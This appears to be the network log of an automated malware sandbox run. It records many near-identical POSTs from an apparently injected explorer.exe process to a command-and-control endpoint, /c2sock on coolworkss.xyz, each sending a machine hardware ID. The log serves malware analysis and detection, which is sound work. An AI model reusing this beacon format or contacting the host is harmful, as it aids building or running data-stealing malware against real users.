Sep 5, 2023 13:02:36.883812904 CEST	2832	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=58rgkfef7lq8ndd9rkf7vrila2; expires=Sat, 30 Dec 2023 04:49:15 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7CXRWlmCsWJQLvtEud1rIQMohCDJBtdGkWHDxPLwOyV3Jx8ukqDV0xLD3BjeYeCWA3Lx05aN7nRuFIYHEXHIh3zMCtHFiDmp3E0QtReMb93sSMFi4HFaFIX%2Fafwzvs36zQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb1e7b0cdb2d-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:36.883862972 CEST	2832	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.4	49752	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:37.785239935 CEST	2832	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:37.786729097 CEST	2833	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:38.206876993 CEST	2834	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=omsoqsrl9p46ontso1r8b2l7dv; expires=Sat, 30 Dec 2023 04:49:17 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cxlHXa6bcrUiLVUcqPdtBT2J8O7IFSpH55TQrnJG%2FcJ2BGpwZdCWtEPrEqzC8aY3hLtWHn9NZwpqFPvvtabfpHqWR87v0Kyt5jUaVCxNrn0KAmpIyJl0Ro8iddAw%2FIIp3w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb2689328dbe-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:38.206954956 CEST	2834	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.4	49753	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:38.509397984 CEST	2835	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:38.511251926 CEST	2835	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:38.906524897 CEST	2836	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=g5t1kki069ljl59hlqppdf0kgi; expires=Sat, 30 Dec 2023 04:49:17 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7y0iyAEotmHN25FfzdfZgEcSPyHA0NasiFH9H4L5MggiRCp7PNP8SnoxKFAl6frzX%2BbiWqUMXWrE%2FsUN%2B2YVFMpRRKAZhzze0hTMTL47GPoDiMmGpkbWvBkhpx4BRc2uRg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb2b1ff08dac-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:38.906574011 CEST	2836	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49719	199.232.32.193	443	C:\Users\user\Desktop\lJ2eYRm0Bd.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.4	49754	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:39.227941036 CEST	2837	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:39.230526924 CEST	2837	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:39.628711939 CEST	2838	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=989mm3tsg542e1ap5po40cm5u0; expires=Sat, 30 Dec 2023 04:49:18 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xLP30bNRZiE3NrGlsoIWlK1TCx6YFIz02RB5BtAxQhvmMLLxbRpfeYYfJaA0Y1z0bHUX5EA6s%2F4NlWK%2FL33iP9xeSFL57UIJSvJymaq7fg73NZsoakgAnUq%2BUUeAr5AAOA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb2f9bbe4c27-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:39.628776073 CEST	2838	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.4	49755	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:39.923727989 CEST	2839	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:39.925218105 CEST	2840	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:40.328150988 CEST	2841	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=c6km89po9uh3ina6sqcotc9922; expires=Sat, 30 Dec 2023 04:49:19 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gAPKlvb1JJctEQn7M17iAaLNyCvS%2FkjoA6FgTXwcpbG6F1IKcGiU6iSefwexJNZ068LuK12N7c9EY4GF1LBPkEV5mk9mMTAb8j5GjgR%2F5O9jiXflWOBUWrivBv5JOkPGyA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb33ee8fdae5-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:40.328222036 CEST	2841	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.4	49756	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:40.648803949 CEST	2841	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:40.649852991 CEST	2842	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:40.955079079 CEST	2843	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=hbsquif8hr9m1ktdc24rd6fhgq; expires=Sat, 30 Dec 2023 04:49:19 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2yKRTZ%2FJDh0ZNIyNsTtXo65kP2uyrT96qSnCEuM0iwvMcR3cfbLndFAH2H9wluEehRtyHiByx5qiGq%2FkgMnefl6qAog1EpekV1%2FBPqebaygiSClTDO94SZGYyBvGDxaRpQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb387c004c27-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:40.955123901 CEST	2843	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.4	49757	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:41.297550917 CEST	2843	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:41.299176931 CEST	2844	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:41.616164923 CEST	2845	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=craibc5i60a9fur74fjcvtc5pd; expires=Sat, 30 Dec 2023 04:49:20 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iUDbYrPs8Up%2Bnu3MGt6%2F3QLW8umzJdpbMffL1MRG%2FXqkE579YBdjCutnEyPDo%2BmHS4KB50lF1qMWXMBhehs0uM5oDx5oFv%2FbUjwb5DRwRwAjJ2l74%2B%2FURMmagnG9Pk%2FHug%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb3c88402886-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:41.616200924 CEST	2845	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.4	49758	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:41.968569994 CEST	2846	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:41.969425917 CEST	2846	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:42.407244921 CEST	2847	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=g517e3odll2cqcknf3p9kgmo68; expires=Sat, 30 Dec 2023 04:49:21 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=soKmNo5CHyuPuIe34NDICsW2gvkfAnb7UbLa7CPST%2BDqhxEKfT%2B2bpJPvSL9NGvPxb%2BAGIk3C%2BYS8sbnDdaF5BqeqYdBcMqE6uo2KUDYfLbGNoFNvn9DSOxEobz9ysJODQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb40bd0721f9-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:42.407289028 CEST	2847	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.4	49759	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:42.735210896 CEST	2848	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:42.736463070 CEST	2848	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:43.156150103 CEST	2849	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=aupmij179tbg6l5nm2r2vls970; expires=Sat, 30 Dec 2023 04:49:21 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f%2BmBL9ogH7BQ48w7%2F8KXH5rmAoi6CU1P6FVMYjG0iBC%2FZvIwsvgMZqdrE13JyAkQ1LwsA7xdUZoWVfWurJD2o1p2xIJrW8Kt2QKa4QCUs%2B898j4ZUesD%2FyURqorX9TAvZw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb45780d21df-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:43.156187057 CEST	2849	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.4	49760	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:43.547434092 CEST	2850	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:43.548638105 CEST	2851	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:43.981542110 CEST	2852	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=rn8fkrimtkhh8gdnf6qhl4f1sl; expires=Sat, 30 Dec 2023 04:49:22 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eatcrtzjXNk%2Fl952jeEkZ6iikvy7o973NxHz7JN3eYFsyAOrDOzLxQgnoKU21DcOsm2CqquptP%2BXRI3yNSV2rQ8X8DYeWwIws5ksA0mTu6H7UnJSbItslAHoFlmOO11UuA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb4a9d965730-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:43.981659889 CEST	2852	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.4	49761	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:44.424302101 CEST	2852	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:44.425565004 CEST	2853	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:44.868376017 CEST	2854	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=dgivu4vmgifromg3ckio560shd; expires=Sat, 30 Dec 2023 04:49:23 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FgAU13z%2FPiSvPA7RsGj3miZupT922PW%2B8VQ0dfC900HSwhd9MYvMfM%2B%2BNLp7Klz3P%2B3VhpehDS%2B96fqQWI0OWvwu%2Bg%2BuzsIJZ7QcHG8PYXhM5V6dVvTCnTgwR6U6nA1TpA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb500aee497c-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:44.868418932 CEST	2854	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.4	49762	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:45.194621086 CEST	2855	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:45.197458029 CEST	2855	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:45.621404886 CEST	2856	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=ne98cocuct2jdj9ftdchg8dru7; expires=Sat, 30 Dec 2023 04:49:24 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lezCIDeGBM%2FxGOQFhMQFCE1t98uXULhB4vE7q1Aq1KYE8Iet7%2F7oTgysBDIMJ%2BWuDR98UgQHgE2EbV6C83pkuJyOn0YibMrIYWeH7V%2FM3GZPrjsBBD5h4MgUI3E8tpvwAw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb54df6e9aec-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:45.621473074 CEST	2856	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.4	49763	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:45.963816881 CEST	2857	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:45.965296984 CEST	2857	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
